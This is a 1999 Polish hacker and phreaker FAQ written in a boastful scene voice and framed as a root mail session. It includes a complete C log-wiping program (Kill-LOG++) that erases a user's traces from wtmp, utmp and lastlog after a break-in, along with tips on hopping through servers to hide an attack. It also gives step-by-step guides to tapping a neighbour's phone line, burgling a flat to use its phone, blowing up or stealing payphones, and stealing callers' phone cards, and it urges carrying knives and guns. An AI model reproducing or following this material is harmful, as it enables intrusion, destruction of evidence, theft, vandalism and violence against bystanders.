connecting transmition...
--
Red Hat Linux release 6.0 (Hurricane)
Kernel 2.2.9 on an i786
--
LOGIN: root
PASSWD:

You have mail
root@anty.tpnet.pl root# mail

MSG FROM Blaze the True_MC [blaze@silesianet.pl]:

  -=BLAZE=- Hack & Phreak FAQ   [Format:Normal-Extra-Size]  Koszalin 1-2/5/99 <*4th UPGRADE*>

 ______________________________________________________________________________________________
|
|    __________                                                                            
|   /          \ _____       ______________________________________________  
| ||            ||   |     //      \_________ |___________  /              |
| ||    ###     ||   |    //   __   \       / /----------/ /|    __________| _______
| ||           _/|   |   //   / \\   \     / /          / /||   |--------- //       \
| ||            \|   |  //   /___\\   \   / /_____     / / ||   |______   //   ___   \
| ||    ####     |   \_//___/_____\\___\_/________|   / /  ||    ______|__||  |-- |  |
| ||             |                               |   \\ \  ||   |------   \|  | _ |  |
|  \\___________/|_______________________________|    \\ \ ||   |  //  __  \  |_\_\  |
|    ---------------------------------------------     \\ \||___| //  / \\  \    \ \ /
|                                               ________\\ \---- //  /___\\  \____\_/
|                                              |____________\   //  /-----\\  \----\_\
|                                             --------------   //__/       \\__\    --
|                                                              ----         ----
 ----------------------------------------------------------------------------------------------	

                                      Today in our main:

I.    WSTEP                                        -----  Read it first ;)))   -----
II.   TEORIA 				           -----  Czym sie zajmujemy   ----- 
	A.    <HACK>
	B.    <PHREAK>
III.  SPIDERMAN ATAKUJE                            -----  Pajak znowu w akcji  -----
	A.    <BLOODY HANDS>
	B.    <WLAM??!!>
	C.    <BYSTRY WZROK>
IV.   NIE BYC ZLAPANYM                             -----  Cos dla lame=venom   -----
	A.    <PHREAK>
	B.    <HACK>
V.    URMET'Y					   ----- Bugi na Telefony firmy URMET ----
	A.    <OUT OF ORDER>
	B.    <ZEMSTA>
	C.    <JAK URWAC>
	D.    <ROZMOWA PRZYCH.>
        E.    <TRZY SEKUNDY>
	F.    <974 - MYK>
	G.    <POLACZENIE BEZPLATNE>
	H.    <ZULE>
VI.   CIEKAWOSTKI                                  -----   Cos dla ciekawskich  -----
	A.    <DUPERELE>
	B.    <HAPPY 99>
	C.    <ANTY NUKE>
VII.  NUMERKI
	A.    <HOT NUMBERS>
	B.    <HUNTING>
VIII. TIPS & TRICKS                                ----- zostawiam [no comment] -----
	A.    <I'VE GOT POWER IN MY MAIL> (house box)
	B.    <HOW TO FUCK UP "LAMMA LIFE" ? >
IX.   P3W33 BOX					   -----      BOX P33weego      -----
X.    SILVER BOX
	A.    <CO TO QRWA JEST>
	B.    <JAK ZDOBYC>
XI.   ZMIANY CO DO POPRZEDNICH VER.                -----     Dawne moje faq     -----
XII.  NETBUS FAQ                                   ----- Faq na temat NETBUSA for lame ----
XIII. WWW - DZIURY
	A.    <HASLO PRZEZ PRZEGLADERKE>
	B.    <SKANER PHF & PHP>
	C.    <HASLO PROVIDERA PRZEZ EXPLOJERA 2.0>
XIV.  FTP BUG's
	A.    <WUFTPD BUFFER OVERFOLW SCANNER>
	B.    <WUFTPD 2.4.2-BETA18 SPL01T>
	C.    <FTP WAR>
XV.  SPRAWY Z MEJLAMI
	A.    <WYSYLANIE FAKE MEJLI>
XVI.   IRC
	A.    <TAKE OVER>
	B.    <JAK ZDOBYC IP DELIKFENTA>
XVII.  SLOWNICZEK 				   -----      Lame Slownik      -----
XVIII. MNIEJ CHRONIONE SERWERY
XIX.H P C TEAM & MALA REKLAMA			   -----   Cos o naszym teamie  -----
XX.  3ND&GREETZ         			   -----    Tnx to:  ******     -----

__________________________________________________________________________________________
I.WSTEP

	<VER> : ZWYKLY EDYTOR TEXTU WYMAGANY !!!??

Opisane tu sposoby nie sa konwencjonalne.
Napisalem ten plik w celu zwrucenia uwagi kilku osob ,ale nie tylko . Mozecie rozprowadzac
ten pliczek do woli , mozecie go pakowac , zmieniac rozszerzenia na jakies tam,
ale skracenie,zmienianie textow jest surowo zabronione 
(jak to ladnie brzmi "surowo zabronione":hie hie)...
Kraza gdzies po necie wersje mojego faq w formacie UNIX'owym ,nie wiem gdzie , nie wiem jak, 
nie wim skad ! Nawet ich nie rozpowszechnialem , ale sa !
Te fakju (to wlasnie teraz czytacie) zostalo napisane w zwyczajnym edytorze windosowskim...
Jedni ludzie mowia ze jestem ostro "pojechany",ale mam
jedno pytanko do was wszystkich:"a czy phreack jest normalny"?
I haslo calego mego FAQ : NIE DAJ SIE ZLAPAC! , zostaniesz zlapany - jestes LAME - slowo
fszystkim znane i przestrzegane...
Ludzie pisza rozne texty , bugi i exploity z ktorych 2/3 nie dziala , a ta teszta (1/3) to
texty typu : zadzwon przez 094 i potem numer 3453821 to dowdzwonisz sie do Koszalina, jednak
ten bug ma wady : za polaczenie placisz jak za normalna miedzymiastowa, ale prace trwaja ...
Jak jestes zagozalym polonista to nie czytaj tego bo moga ci nerwy puscic , bledow jest 
od cholery , jedne zrobione sa celowo , a drugie tak poprostu z mojej nie wiedzy , nie 
miej do mnie zalu ...

I teraz znany wszystkim text (i tak go nikt nie czyta ,ale lepiej zeby byl!?!):

	 ____________________________DISCLAIMER: ____________________________________
	|Wszystko co opisalem ponizej sluzy tylko do celow edukacyjnych,nie ponosze |
	|konsekwencji jezeli cos nie wypali i ktos was zlapie na goracym uczynku!   |
	|             Blah,Blah,Bla wiecie formalnosc?!                             | 
	+===========================================================================+

Qwa , pamietajcie kogo mamy okradac????????
TP S.A. a nie lusterow ,ani innych zwyczajnych ludzi !
A za co tak bardzo kochamy TP'sow???? Za:

*niesamowity "dynamiczny" routing (w obrebie tego samego miasta mozna poruszac sie co 
jakis czas nawet przez USA,Szwecje i Rosje, dochodzac do dwudziestukilku hopow).

*przestrzeganie CIR'a na laczach POLPAK-T sprzedawanego w ilosci kilkakrotnie
przekraczajacej przepustowosc lacza. 

*skonfigurowanie modemow dostepowych 0202122, tak by klient za kazde niezrealizowane 
polaczenie zaplacil choc jeden impuls 

*"promocyjne" znizki za posiadanie wlasnych modemow i lini (placac za nie dziesiec razy
wiecej niz wynosi abonament, mozemy liczyc na zmniejszenie abonamentu o 5%) 

Qwa jak ja ich nie cierpie!

Kto ja? Jam jest blaze , pochodze z tej drugiej strony... Lubie pic (ostro) , 
palic (ostro) , rozwalac boodki (b.przesadnie) , pisac w C , pisac (wogole) ,
przejmowac miana roota na serverach , itp ... Znajdziecie mnie wszedzie : IRC (#PHREAKPL),
BBS (hehe *TOP SIKRET*) :))))))))))
Mieszkam w koszalinie - miescie lamerow ;] Jest dokladnie tak jak pisze , mozecie sie o tym bardzo latwo przekonac - wchodzac na #koszalin ;P Znam tylko pare osob z ktorymi mozna normalnie pogadac (krizz) ;] Tpsa w moim miescie mozna porownac do zuli & pijakoof - moze o tym swiadczyc fakt ze stoi sobie taka budka ( dokladnie na tatarkiewicza kolo sano )- obok wystaje 5000 kabli czerowno-zielonych , albo przyklad z mojej piwnicy - wchodzisz a to wszystkie puszki bez kludek - nie wazne czy to phone cz to korki wszystkie jednakowo pootwierane ...
__________________________________________________________________________________________
II.TEORIA

	A.<HACK>
Tak... Znane nam wszystkim slowo "HACK" . Trudno <me> bedzie wytlumaczyc co to dokladnie jest ,
w dzisiejszych czasach slowo "HACK" jest wszelako odbierane jak i rozumiane . Jedni mysla ze
zapuszczenie netbusa na jakiegos kompa to juz stu % hacking , drudzy bawia sie w kodach 
zrodlowych programow (typu sendmail) i szukaja backdoor'ow , 
nie nazywaja tego hackiem tylko robia to dla wlasnej sadysfakcji i traktuja to jako zabawe ... 
Czy hack jest potega jak i bronia , zle urzyta - moze byc karana .(gadanie)

	B.<PHREAK>
Jednym zdaniem mozemy powiedziec ze jest to taki hack na boodkach telefonicznych .
Jak to napisali w jednej z wielu gazet : phreakerzy to zlodzieje impulsow telefonicznych :)))))
Jest to pojecie ogolne , ale juz podpiecie pod sasiada przez rozne srodowiska nazywane jest
PHREAKIEM . Spotkalem sie z roznymi odlamami phreaku :
*Carding       - zaczynajac od kart magnetycznych a konczac na chipowych .
*Spider [ing?] - wlasnie podpinacze tzw . Spajdermeni
*Programing    - zastosowanie przy kartach o takiej samiej nazwie lub
		 przy programowaniu kart chipowych
__________________________________________________________________________________________
III.SPIDERMAN STRIKES AGAIN...

Tu dzial poswiecony dzwonieniem za free z udzialem sasiada (*<grin>*). 
Zapytacie "Da sie?".A ja wam na to 
:"Wszystko sie da! Dla chcacego nic trudnego".
NIE DAJ SIE ZLAPAC! Za wpadke ostro dostaniesz od starych no i od TPwsiarzy.
A wiec jak dzwonic? Ok! Po co mamy siedziec 24h w piwnicy,jak mozemy
wylegiwac sie w cieplym,suchym domciu!

	A.<BLOODY HANDS>
Ten sposob dziala wszedzie na 100%,a jest go tak prosto zrobic ze az skreca z bolu.
Ok co trzeba?:

*cazki lub obcazki (czy to nie to samo??)-takie do ciecia kabla
*skalpel(do zarabiania i skrobania kabla)
*tasma izolacyjna *najlepiej biala*
*srubowkret (krzyzny i plaski)
*Noz (dla nie powolanych gosci prosto w brzuch!No coz takie mamy czasy?!)
*lutownica (wiadomo po co,ale nie trzeba)
*latarka (odrobine oswiecenia)

Teraz idziemy do piwnicy (najlepiej indywidualnie),lokalizujemy skrzynie telekomuny.
Masz inna np.Netie to masz pecha i z dzwiczkami beda klopoty poniewaz zamki
sa ryglowane na 3 specjalne walki czyli bez klucza nie masz co startowac. :P
Mamy TP bude ?! Poswiecamy latarka i srubowkretem (plaskim) wywalamy drzwiczki jesli nie sa otwarte tak jak to bywa :)))))
Teraz maly problem:
Lokalizujemy swoja linje! Najlepiej zostawic u siebie qmpla ktory zadba o reszte (pomoze), 
a czasami monterzy ulatwiaja sobie zycie (przyklejaja do poszczegulnych kabli takie tasiemki
na ktoorych mamy WYRYTY numer mieszkania do ktorego dana linja prowadzi).
Kiedy juz ja mamy lokalizujemy linje jakiegos frajera ktory malo dzwoni i nie ma go przez 
okreslony czas w domciu !
Teraz tniemy obydwa kable i zarabiamy je tak zeby linja "wsiaza" szla do nas a nasza do nego!
Wystko izolujemy,najlepiej biala tasma tak zeby nie bylo widac!
Wpychamy kable,zamykamy bude,zacieramy slady i truchcikiem do domu nabijac rachunek!
Lecz mamy problem : wiec z inna linja mamy inny numer czyli qmple dzwonia do niego a nie 
do ciebie! Ale 0202122 jest twoje .Ryzyko ostre,ale warto jeszcze jak taki frajer co jestesmy
do niego podlaczeni wyjechal na pare miesiecy, u mnie jest taki koles ktory wali wszystko!
Nie ma go przez 340 dni w roku,przyjezdza raz na miesiac i jest ok ! Placi podatki za telefon!
Niczego sie nie domysla,poprostu pozytywny frajer!
RYZYKO! Ale jezdze na tym raz na rok!

	B.<WLAM ?!>
Nastepny sposob to:
Nie ma sasiadow w domu ? Nie kce ci sie chodzic do piwnicy zeby zadzwonic za friko ?
Jestes za glupi zeby zastosowac sie do powyzszego sposobu!
Ok ale co i jak?
Sposob jest prosty:
Dyskretny wlam na mieszkanie np.przez otwarte okno balkonu!
Mamy w ten sposob cala chate dla siebie : zero stresu :jeden miech dobrej zabawy telefonem!
UWAGA niczego nie wynosimy z domu ofiary :) !Zostawiamy tak jak bylo ,nie robimy zadnych
dowodow o naszej bytosci w mieszkankue & ze uzwalismy mieszkanka kiedy nikogo nie bylo w doomu!
Byl taki moment ktoorego nie zapomne ! Ktosik przyszedl do takiego mieszkania w odwiedziny
(sa przekrenty np .babcie poproszone przez wlasciciela mieszkanka o podlanie kfiatkoow etc.) ,
wyfrunolem szybko przez okno,szczescie mialem ze bylo 1 pietro,heh nic sobie nie zlamalem!
NIE DAJEMY SIE ZLAPAC!!!!! Tylko ze takie cos nie jest zwyklym wykroczeniem !!!!!!!
Ostra jazda,ale oplaca sie!
Nie polecam nowicjusza i ludzia o lekkich nerwach no i dla lamme ktorzy sie cholernie boja !
Masz inne lepsze sposoby mail 2 me.

	C.<BYSTRY WZROK>
	Troszke lame topic , ale jestem po imprezie... Dobra do rzeczy jak wchodzimy 
do budki to co widzimy ? na pierwszy rzut oka AUTOMAT 
, ale jak bardziej sie przyjrzec to gdzie nie gdzie 
mozna zobaczyc kabelki zaizolowane jakas guma wchodzace w sciane . Co robimy>?
Izolacje wypierdalamy , kujemy w sciane ,kabel ucinamy , robimy jakiegos backdora , 
podpinamy sie i dzwonimy.. Trudne? Lepiej popatrzec gdzie ida kable, 
jak za jakies krzaki gdzie nikt by nas nie zauwarzyl no to mamy zabawe w numerki...
	Czasami warto jest sie wybrac gdzies na stare budownictwa - gdzie domy sie rozsypuja 
a jeszcze ktos w nich mieszka i na dodatek ma telefon . Zapytacie : "A po chuj mi stary dom?"
To tak : Sa takie budynki gdzie jak by mocniej kopnac w sciane to by fszystki tynk poodpadal -
tepesy sie tego cholernie boja bo gdyby przy zakladaniu linji cos 'nie daj boze' odpadlo to
wlasnie oni poniesli by z tego koszty , wiec 'debile' robia prowizorke i zakladaja linje tak 
sobie na wierzchu ktora idzie pod parapetami lub po dachu i dopiero dochodzi do naszego
kochanego abonenta I TU ICH MAMY ! Ogladamy ze fszystkich stron taki budynek i :
I. Jak linja wychodzi z ziemi (mamy farta)
No jak wychodzi z ziemi to znajdujemy jakies krzaki - tam gdzie nie bedzie nas widac i dalej jush chyba bedziemy wiedzieli co trzeba zrobic ;]
II.Jak idzie goora (lekki problem)
To fchodzimy na dach , albo szukamy takich 'zwisoof' (kabel zwisajacy).

O albo teraz nie dawno blaz3 podpiol sie do przedszkola (dlaczego?) ,bo otwarte maja tylko do 
17 00 (w dni powszednie) ,bo maja dwie linje a rachunki przychodza im zajebiscie duze , 
pozatym to centralne zadupie... Trzeba zafsze szukac czegos co ma wiele zalet korzystnych dla
nas samych .

__________________________________________________________________________________________
IV.NIE BYC ZLAPANYM

	A.<PHREAK>
Co zrobic zeby nie byc zlapanym?
	Zawsze trzba sie zabezpieczyc w jakies narzedie odstraszajace ludzi typu:
*GUN <pistolet> (lekka przesada,no ale railgun by moze wystarczyl?!)
*NOZYK <kosa>   (podstawowe wyposarzenie mojego phreak-o-plecaka)

Jeszcze do tego Gaz paralizujacy i Ok.Masz w dupie "ciekawskich".
Zawsze wykrecam korki z piwnicy tak zeby nie bylo w niej swiatla,lubie
sie poruszac z latara , ale tak chyba bezpieczniej.
Potem zamykam drzwi na klucz od srodka i odkrecam klamke,tak ze od zewnatrz nikt mi nie
podskoczy kiedy bede zajety!
	Mosisz byc 100% Anonimowy,rob to zawsze z zaufanymi przyjaciulmi (tzw."qmplami")
                   lub SAM (indywiduale mile widziane).
 Nie chwal sie tym co robisz ,bo to na serio nie jest w porzatku i jakis lame-qmpel moze wykapowac
dla Sekret Ser-Zwis i co wtedy? WIEZIENIE HALIFAX lub w lepszym przypadku wyslanie na SYBIR , hehe
Zacieraj zawsze za soba slady! Kiedy zostaniesz zlapany np.w piwnicy mowisz
ze ty sobie wyszedles zapalic a tu jakis lammus poczol uciekac w kierunku okna,
ze nie mogles go gonic bo masz chora noge (jestes weteranem wojennym czy cos
w tym stylu,improwizacja mile widziana. Nigdy nie poruszaj sie Autobusami poniewaz masz
wtedy ograniczone pole ucieczki i musisz czekac do nastepnego przystanku! 
Kiedys wsiadlem i to byl moj blad!

	B.<HACK>
Tutaj nie pomoga ci brzytwy i noze ... Tutaj musisz byc sprytny i ostrozny !
Przed atakiem lepiej zrobic petelke i 'zaloginowac' sie z min. 5 serverami to znaczy :
login na jeden serwer - potem z tego aktywnego (na tym co teraz sie logowalismy) na drugi 
i tak z 15 petelek...
Lepiej 'atakowac' z terminali dial-up - TPSA - choc chujostwo to i tak jest niezalezne i wszystkich
adminow ma (delikatnie) w PUPIE , a po drugie to taki przecietny ADMIN (lama/pozitiv juser) 
wysledzi ciebie do np .                  ppp4-210.                 warszawa.tpnet.pl
                                           ^^^^                      ^^^^^^^^^^^
                                   numer terminala ppp    centralny zjeb czyli routing+domena TePeeSA
I TAK NIC TO MU NIE DA !
Po kazdym nastepnym polaczeniu ze TePEeSa dostajesz nowe IP , hosta i terminal wiec jestes 
bezpieczny...
Po ataku (jak jush sciagniemy sobie passwd i rozne bajery) lepiej wyczyscic logi
 (WTMP , UTMP , LASTLOG) , a jak nie macie czasu a trzeba dzialac szybk0 to programik KILLOG zrobi
to za was...

---CUT HERE---

/*

 Kill-LOG++ v0.99b (for linux)
 ----------------------------------------------------------------------------
 Napisany przez nieznajomego, przerobil: LamCker dnia 21/12/98
 Testowany na Red Hat 4.x & 5.x z kernelem v2.0.27 i v2.1.43
 ----------------------------------------------------------------------------
 Ten program usuwa wszystkie slady uzytkownika z logow. Wymagany root :)
 Kompilacja: "gcc -o killlog killlog.c"                  
 Uzycie: "./killlog username", ew. "./killlog lamer"
 ----------------------------------------------------------------------------
 Dla jakis ciemnych linuxowcow: uzyj "find / -name xxxx" (gdzie xxxx oznacza
 wtmp, utmp i lastlog) aby zlokalizowac plik z logami, potem skompiluj       
 Kill-LOG++ z prawidlowymi sciezkami:

 gcc -o killlog killlog.c -DWTMP=\"sciezka_do_wtmp\" -DUTMP=\"sciezka_do_utmp\"
                          -DLAST=\"sciezka_do_lastloga\"

*/


#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>


#ifndef WTMP
  #define WTMP "/var/log/wtmp"
#endif

#ifndef UTMP
  #define UTMP "/var/run/utmp"
#endif

#ifndef LAST
  #define LAST "/var/log/lastlog"
#endif


int f,err=0;

 
void kill_utmp(char *who) {
  struct utmp utmp_ent;
  printf("Czyszczenie utmp... ");
  if ((f=open(UTMP,O_RDWR))>=0) {
    while(read(f,&utmp_ent,sizeof(utmp_ent))>0)
      if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
        bzero((char *)&utmp_ent,sizeof(utmp_ent));
        lseek(f,-sizeof(utmp_ent),SEEK_CUR);
        write(f,&utmp_ent,sizeof(utmp_ent));
      }
    close(f);
    printf("zrobione.\n");
  } else {
    printf("nie moge otworzyc pliku z logami.\n");
    err=3;
  }
}
 

void kill_wtmp(char *who) {
  struct utmp utmp_ent;
  long pos=1L;
  printf("Czyszczenie wtmp... ");
  if ((f=open(WTMP,O_RDWR))>=0) {
    while(pos!=-1L) {
      lseek(f,-(long)((sizeof(struct utmp))*pos),L_XTND);
      if (read(f,&utmp_ent,sizeof(struct utmp))<0) pos=-1L;
        else if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
          bzero((char *)&utmp_ent,sizeof(struct utmp));
          lseek(f,-((sizeof(struct utmp))*pos),L_XTND);
          write(f,&utmp_ent,sizeof(utmp_ent));
          pos=-1L;
        } else pos+=1L;
    }
    close(f);
    printf("zrobione.\n");
  } else {
    printf("nie moge otworzyc pliku z logami.\n");
    err=4;
  }
}

 
void kill_lastlog(char *who) {
  struct passwd *pwd;
  struct lastlog newll;
  printf("Czyszczenie lastloga... ");
  if ((pwd=getpwnam(who))!=NULL) {
    if ((f=open(LAST,O_RDWR))>=0) {
      lseek(f,(long)pwd->pw_uid*sizeof(struct lastlog),0);
      bzero((char *)&newll,sizeof(newll));
      write(f,(char *)&newll,sizeof(newll));
      close(f);
      printf("zrobione.\n");
    } else {
      printf("nie moge otworzyc pliku z logami.\n");
      err=2;
    }
  } else {
    printf("nie znaleziono uzytkownika.\n");
    err=1;
  }
}


int main(int argc,char *argv[]) {
  printf("\nKill-LOG++ 0.99b -- Unixowy czysciciel logow (przerobil LamCker)\n");
  if (argc!=1) {
    printf("----------\nUsuwam uzytkownika z logow.\n",argv[1]);
    kill_lastlog(argv[1]);
    if (!err) kill_wtmp(argv[1]);
    if (!err) kill_utmp(argv[1]);
    if (!err) printf("Cool! Wszystko jest ok.\n");
      else printf("Cholera! Cos jest popieprzone.\n"); 
    printf("----------\n\n");
  } else printf("Uzyj: %s username\n\n",argv[0]);
  return err;
}

---CUT HERE---

	C.<CO ATAKOWAC>
Moja rada : lepiej darowac sobie maszyny rzadowe i wojskowe , pomimo ze te druge sa 
__________________________________________________________________________________________
V.URMET'Y

Sposob numer 1 :

	A.<OUT OF ORDER>
Ten lubie!

Kazdy zna sposob na szybkie "unieczynnienie" niebieskiego... Jak nie to :
*zanim podniesiemy sluchawke wciskamy byle jaki przycisk na panelu i trzymamy,podnosimy
sluchawke i ciagle ciskamy przycisk, az pojawi sie na wyswietlaczu "nieczynny" , puszczamy,
mamy dial tone w sluchawce...

I co z tego??
Po zawieszeniu automatu sprawdzamy czy dziala klawiaturka na panelu... Jak dziala to znaczy , ze
ten bug na tej budce nie dziala (znajdujemy inna,jak znowu dziala to nastepna). Jak juz 
znalezlismy takiego delikfenta to :
*sprawdzamy czy dziala mikrofon (jak?> dialerkiem , albo w niego dmuchamy (w mikrofon of koz!)
- jak uslyszymy w swojej sluchawce oddech (nie siwezy) to znaczy ze mik. jest odblokowany , 
jak nie to nie (szukamy innej)... I co potem ?
*Sprawdzamy dialerkiem (centrala tonowa i na 80% na niej nie dziala) .
*Nagrywamy na dyktafon przerywania/pulsy danego wybranego przez was numerku i odgrywamy je przy 
mikrofonie..

Co zrobic jezeli mam zablokowany mikrofon??
*Szukamy innego
*Stukamy widelkami dany numer - uciarzliwe jak stukamy numer 7/100 cyfrowy 
Jak stukac? Najlepiej pocwiczyc , mosi byc odpowiednie tempo , odpowiednie przerwania przes kazda
nastepna cyfra ! Mozna poprobowac...

Sposob 2 :
	B.<ZEMSTA>
Kiedys sprawdzalem odsrodkowa wytrzymalosc niebieskich!
CO bedzie potrzebne:
*duuza petarda (taka za 7 zl styka,ale samemu mozna zrobic)
*klucz do niebieskiego/srebrnego,lom,srubokrety lub otwarty blekiciak-srebro
*Szybkie buty a raczej nogi...
*aparat - robimy nim zdjecia przed i po zabawie
Ok otwieramy blekiciaka,wypierdalamy potrzebny sprzet a reszte rozpierdalamy w drobny mak
My nie tracimy (no moze petarde,ale za to jaki ubaw) TPsy tak??
Wsadzamy w srodek zapalona petarde,zamykamy,spierdalamy gdzies w bezpieczne miejsce z ktorego
mozna by zauwazyc nasze male miejsce zbrodni, i co?? Wyjmujemy aparat,czekamy na efekt i pstryk.
Potem mamy zdjecie do rodzinnego albumu (hihi).
Co sie stanie? Na zewnatrz nic. Od wewnatrz pyl,mak,piasek .itp
Uwaga ! Urmet po takim zabiegu juz nie dziala ! Polecam na nowy rok ?!
Zalety i Wniosek calego Myk'u
Postawia srebrnego!
A kto srebrnego nie rozbieral to bedzie mial szanse na *czmychniecie* takiego egzeplarza!

AAAA.Za sama bude mozesz na zlomie uzyskac ciezka kase (20zl od jednego egzeplaza).Uwaga taki burak co skupuje moze wydac ciebie TPsom/policji.

	C.<JAK URWAC>
Maly off-topic , ale warto przeczytac.
Jak urwac jakiegos URMETA ? 2 Lomy , mlot pneumatyczny ze sprerzarka elektrodynamiczna ...
					/\/\/\/\/\/\
				     takie sposoby stosowane byly w sredniowieczu !?

Najprosciej bedzie poszukac jakiegos lekko kiwajacego URMETA , a takich jest w chuj .Teraz jak
juz takiego mamy to najlepiej zeby od tylu byla lekka szparka (nie ta pomiedzy nogami 
naszej dziewczyny tylko taka pomiedzy sciana a automatem firmy URMET) , wtedy kiwamy dyskretnie
automatem na lewo i na prawo (tak zeby go jeszcze bardziej 'rozdziewiczyc') . Kiedy juz wszycho
husta sie na podmuch wiatru , a tynk ze scian juz odpadl to :
*przygotowywujemy torbe (ja urzywam takiej duuuzej)
*sruby lekko podpilowywujemy brzeszczotem (taka pilka)
*TERAZ NAJWARZNIEJSZE - z calej sily hwytamy go od spodu i ciagniemy do gory
Na poczatek pojdzie 1 sroba , potem nastepna i jeszcze dwie ...
*Chowamy do plecaka/torby r0x
*Spierdalamy r0x
*Wieszamy u siebie (w chacie) na scianie ... r0x
*Cieszymy sie od ucha do ucha ! r0x

	D.<ROZMOWA PRZYCH.>
Co bedzie potrzebne :
Bug dziala na fszystkie automaty typu urmet czyli mamy uproszczone zadanie .

*Tone Dialer lub telefon komurkowy z glosnym wybieraniem tonowym
*Jakas karta z 1'dnym kredytem , zeton , lub komoora zalerzy z czego kcemy dzwonic 

Znacie ten myk zapewnie z innych fakjusow , ale prawie wszedzie jest on lame opisany , trzeba 
przeciez pisac zwiezle , na temat i jezykiem zrozumialym dla przecietnego usera , przeciez
FAQ ma pomagac , a nie ma pokazywac jaki ktos jest niekompetentny itp. 
Wrocmy do naszego topica , ano podchodzimy do jakiejs budki , najlepiej tam gdzie jest ich dwie 
lub wiecej , jeszcze lepiej by bylo jak jedna z nich miala kolor srebrny ,
dlaczego ? Bo po nacisnieciu przycisku "D"
na panelu wybierania otrzymamy numerek automatu z ktorego dzwonimy [znaczy sie srebrnego of koz]
jak mamy inny automat typu niebieskiego to spox , numer automatu wyryty jest na budce , albo
centralnie na nim , jak go nie ma to dzwonimy na inf. obslugi klijeta i improwizujemy ....
Jak mamy juz numerek budki byle jakiej (srebrnego,niebieskiego,wrzutowego) to bardzo pozytywnie,
juz jestesmy gotowi zaczac zabawe . Dzwonimy na nasz automat-ofiare (do tego co fczesniej 
zdobywalismy numer) najlepiej stac obok automatu do ktorego dzwonimy , kladziemy sluchawke 
w tym co dzwonimy i momentalnie podnosimy temu co dzwonilismy na niego . Kredyt zostal na karcie,
w mikrofonie mamy na poczatek zajete a porem cisze , mikrofon odblokowany , na wyswietlaczu 
"ROZMOWA PRZYCH." , teraz wyjmujemy cos do generowania tonow wlasciwych - przykladowy tone dialer
, przykladamy dialerka do mikrofonu i krecimy/wybieramy numerek .
U mnie dziala tylko w okolicach dworca , bo tam grasuje centrala reagujaca na tony. U ciebie
tez powinno funkcjonowac bez zarzutoof.

	E.<TRZY SEKUNDY>

Topic brzmi jak jakis manifest typu " 15 minut - jak reanimowac" ... He he , to bedzie o czyms 
innym...
	Koszalin to takie fajne miasto ze starymi centralami z ktorych 4/5 nie rozpoznaje tonow.
Wiec dialerki zostawiamy w domciu lub fsadzamy centralne w zad jak chcemy dzwonic na L/D albo
probowac na karciane , jest jeden myk zeby sobie zadzwonic 3 secundy za friko ...
QWA 3 SEKUNDY , ale zafsze cos : W koszalinie jest na dworcu (a dokladnie przed) automat wrzutowy
(ma sie rozumiec na zetony of koz) wyciagamy 
"Generatora Dzwiekopodobnych Tonowych Sygnalow Telefonicznych" - CZYLI PO POLSKIEMU : Tonedialer.
Podnosimy sluchawke tego iz automatu (nie wrzucamy monety) , przykladamy dialera do mikrofonu 
sluchawki i zaczynamy krecic sekfencje 3 , 4 i 7 numerowe ... Mamy 3 sekundu ze fri i potem 
zrywa polaczenie - dlaczego ? Centrala nie dostaje dzwieku jednego impulsa (takie tii) ktory 
powstaje przy zarzuceniu zetona A w otwor wrzutowy ... Jak to ominac ?

Sposob nr . 1
	|LAME BOX| Zeton na niteczce (eee odpada).
Sposob nr . 2
	|CHUJ-WIE-JAKI-BOX]-Box generujacy co 57 sekund dzwiek jednego impulsa . 
Dlaczego co 57 sekund ? Bo te 3 mamy za darmo... :-:

	F.<974-MYK>
Jest to jakby ominiecie myk'u <Trzy sekundy> , no dzialamy bez dialera-a to juz postep ?!
Zajmijmy sie aparatem wrzutowym , bez tarczy tylko tym z przyciskami (ach ta telekomunikacja) .
Dobra , w Koszalinie jak dzwonie na 974 - baba mowi dwa razy-dziwnym glosem "nie ma takiego numeru"
potem jest szybkie busy i cisza a mikrofon i klawiaturka automatu odblokowana . Jak wykrece
jakis numer typu 34***** to wielki shit i fszystko wisa , jak wykrece jeszcze raz 974 to 
znowu szybkie busy i cisza to ja mu jeszcze raz to samo i on mi na to szybkie busy i cisza ,
wreszcie siem wkurwil (trudno zostac opanowanym) i dalem mu dwie cyfry 3 i 4 i co ? DIAL-TONE
Dzwonimy gdzie kcemy za fri , jezeli dzwonimy dialerem to  i tak mamy 3 sekundy , wiec po co
wyjmowac dialera (jak umnie na centrali i tak tony nie sa rozpoznawane w wiekszosci przypadkow)
lepiej centralnie wybrac z klawiatoory i 3 sekundy za fri hie,hie.
I znoof BOX by si przydal...

	G.<POLACZENIE BEZPLATNE>
Gdzie,niegdze (na zadupiach i b.starych centralach telefonicznych) 
mozna zaobserwowac fajny myk... Jak podniesiemy sluchawke to ni ma dial tone 
o ile Urmet nie jest popsuty to juz 50% ze ten bug bedzie dzialal na danym obszarze.
Caly myk siedzi w tym ze jak centrala jest przeciarzona i ma cholerne 'lagi'-(chyba mozna
urzyc tego slowa w przypadku centrali?) to na dial tona mozemy poczekac z 15 sekund ,
a co w tym czasie robimy? Krecimy jakies 0800 , na wyswietlaczu widnieje napis
"polaczenie bezplatne" albo "numer bezplatny" ,czekamy , czekamy i mamy dial tone ...
centrala mysli ze juser dopiero podniusl sluchawke , a automat zglupial i sadzi ze dzwonimy
na numer darmowy (0800) . A co robimy dalej chyba nie wymaga komentarza ?
W Koszalinie probowalem tak na jakiejs nowo zainstalowanej centrali 
(numary zaczynajace sie od 346) i bug jakos sie krecil . Na francuzkich pentacontach myk 
przetestowany lecz z ujemnym skutkiem :<<<<<<<

	H.<ZULE>
Lame topic , ale coz wiele ludzi sie na to nabiera... Sa dwa rodzale niebieskich urmetow,
znaczy sie inne maja dupy (tam gdzie wypluwaja karty) jeden ma walek i sobie wykrecamy karte , a
drugi ni ma nic tylko taka 'rure'.

ZUL NUMBER 1 (na niebieskie z walkami)

Podchodzimy do niebieskiego i patrzymy w miejsce gdzie wypluwa karty , co widzimy ?

      ______________________
    /|                    |-|
   | |____________________|-|   Wybaczcie za ta rewelacyjna jakosc ASCII
   | |--------------------|-|
   | | 		URMET	  |-|
   | |____________________|_|
   |_/_____________________/

Dobra do rzeczy... Wsadzamy do automatu karte (zurzyta najlepiej) i nic nie odbieramy , karta
zostaje w automacie. Czekamy na jakiegos delikfenta , koles fsadza karte , dzwoni i odbiera tfoja
karte a jego zostaje w automacie > A my (zule) podchodzimy do automatu i zbieramy owoce naszej
ciezkiej pracy...
